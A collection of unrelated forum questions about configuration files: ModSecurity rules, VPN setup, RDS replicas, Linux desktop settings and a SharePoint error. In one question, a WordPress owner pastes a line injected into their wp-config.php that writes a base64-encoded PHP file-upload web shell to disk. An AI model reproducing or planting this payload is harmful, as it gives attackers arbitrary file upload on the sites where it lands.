Is `SecAction` order important for an OWASP ModSecurity config file?

Using a web server with Nginx + ModSecurity + OWASP ModSecurity Core Rules…

On the OWASP config file crs-setup.conf is the order of the config section SecAction important or can i order them differently from the example config file ?

Example:

SecAction \  "id:900250,\   phase:1,\   nolog,\   pass,\   t:none,\   setvar:'tx.restricted_headers=/proxy/ /lock-token/ /content-range/ /translate/ /if/'"  SecAction \  "id:900200,\   phase:1,\   nolog,\   pass,\   t:none,\   setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" 

By default SecAction id:900200 is written before SecAction id:900250, is that order important?

How to config site-ti-site VPN from Unifi USG to OpenVPN server

I’m trying to configure our Unifi USG with a site-to-site VPN into a private OpenVPN server with several computers behind it (which currently works with individual OpenVPN clients). The USG documentation for doing this is a bit vague and I’m looking for clarifications for these four fields:

• Remote Subnets: Click Add Subnet to add an address for a remote network.

So, the remote internal subnet? If server1 is at 172.31.1.2, server 2 is at 172.31.2.3, and server3 is at 172.31.4.5, I could enter 172.31.0.0/16?

• Remote Host: Enter the hostname of the remote router.

Why a hostname when the next field has the IP address? Is this just the reverse lookup of the IP address in the next field?

• Remote Address: Enter the internet IP address and port number of the remote router.

The Internet IP address and port of the OpenVPN server from the .ovpn file?

• Local Address: Enter the internet IP address and port number of the UniFi Security Gateway.

The internal network IP address of the USG, or our static external Internet IP address? And what port to specify here?

Does replica config parameter affect primary/master RDS Postgres?

I want to add hot_standby_feedback = on to a RDS readonly replica.

The problem is that the replica currently has a parameter group already attached, which is inherited from the master. My question is: does adding hot_standby_feedback = on to the master parameter group affect the master instance negatively so that I’d better attach a new parameter group to the replica?

htaccess and wordpress config files are regularly over written

I have a WordPress site (v5.2.3), and every now and again (possibly monthly) the wp-config.php and .htaccess files are over written with bad information.

This results in two problems – first the DB access details in wp-config are changed to something don’t work, and then the ability to access my post-link permalinks are lost as a result of information being lost from htaccess.

After being overwritten, my wp-config file is full of lines like this:

file_put_contents("wp-remote-upload.php", base64_decode('PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRklMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYikiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg==')); 

My wp-config file has so many of these lines that it is about 800Kb in size.

The plugins I am using on my WordPress site are as follows:

  • Akismet Anti-Spam [v4.0.1 by Automattic]
  • Contact Form 7 [v4.9.2 by Takayuki Miyoshi]
  • Duplicator [v1.2.3 by Snap Creek]
  • Google Analytics for WordPress [v7.7.1 by MonsterInsights]
  • Hello Dolly [v1.6 by Matt Mullenweg]
  • Limit Login Attempts [v1.7.1 by Johan Eenfeldt]
  • Logo Slider [v1.4.7 by EnigmaWeb]
  • Recent Posts Widget Extended [v0.9.9.7 by Satrya]
  • Squelch Tabs and Accordions Shortcodes [v0.4.1 by Matt Lowe]
  • WordPress Importer [v0.6.3 by wordpressdotorg]
  • Yoast SEO [v5.9.1 by Team Yoast]

Using my FTP program I have tried changing the permissions to the wp-config.php and .htaccess files so they cannot be written to – however my attempts to change these values have resulted in no changes. I am assuming I do not have the ability to change file permissions.


How do I stop these files from being over written?

Or how I can discover what is responsible for changing these files?

How to assign a priority number to “update-alternatives –config gdm3.css” in a single cmdline?

I am able to run these commands in the terminal:

$   sudo update-alternatives --install /usr/share/gnome-shell/theme/gdm3.css gdm3.css /usr/share/gnome-shell/theme/mytheme/mytheme.css 10 $   sudo update-alternatives --config gdm3.css There are 2 choices for the alternative gdm3.css (providing /usr/share/gnome-shell/theme/gdm3.css).    Selection    Path                                                    Priority   Status ------------------------------------------------------------ * 0            /usr/share/gnome-shell/theme/ubuntu.css                  10        auto mode   1            /usr/share/gnome-shell/theme/mytheme/mytheme.css         10        manual mode   2            /usr/share/gnome-shell/theme/ubuntu.css                  10        manual mode  Press <enter> to keep the current choice[*], or type selection number: 1 update-alternatives: using /usr/share/gnome-shell/theme/mytheme/mytheme.css to provide /usr/share/gnome-shell/theme/gdm3.css (gdm3.css) in manual mode 

I will put these two cmds in python3.6 subprocess.run().

The issue I have is with the second command. How do I assign /usr/share/gnome-shell/theme/mytheme/mytheme.css to be the alternative of gdm3.css in the same cmdline as sudo update-alternatives --config gdm3.css?

Also, this cmd requires a number entry to select mytheme.css. The assigned number is dependent on the assigned priority, which means the assigned number can be quite arbitrary. How do I overcome the arbitrary nature of the assigned number?

Lubuntu 18.04LTS touchpad config: CLI solution to turn off tapping?

I have seen numerous posts about touchpad issues, but have mainly seen GUI solutions, such as adding “touchpad-indicator” (which didn’t work the way I’d hoped) or synaptics (which froze my keyboard at login requiring a whole reinstall). I have seen a great tutorial of exactly what I hope to accomplish for 18.10 here: anglehit

But the problem is I don’t seem to have an xorg.conf.d file in /etc/X11 in Lubuntu 18.04LTS.

I would love to just open a text editor, change a setting to something like:

tapping = "off" 

Hit save, and be done. Is there any way to do this on Lubuntu 18.04LTS?

Thank you very much.

Purge Guake with config files: Preference files survive somewhere

I need to completely remove Guake. It seems to have some bug that I triggered while setting keybindings. Now the “close tab” keybinding does not work anymore. I tried

$   sudo apt-get purge guake $   sudo apt-get purge --auto-remove guake 

and different variantions of these. When I reinstall Guake, my old preferences are still there: Keybindings, color scheme etc. I can’t locate where the preference files are located though. How can I remove Guake entirely together with the somehow broken preference files?

insufficient sql database permissions for user impersonationlevel config database

What do user try go do that the following error is generated in the wfe server log? I looked at the ULS log for dsmith01 and did not find anything. Please suggest.

Insufficient SQL database permissions for user 'Name: xxx\dsmith01 SID: S-1-5-21-3736358454-1868704084-1822373674-51997 ImpersonationLevel: Impersonation' in database 'SharePoint_Config' on SQL Server instance 'xxxx\SHAREPOINT'. Additional error information from SQL Server is included below.  The EXECUTE permission was denied on the object 'proc_GetTimerRunningJobs', database 'SharePoint_Config', schema 'dbo'.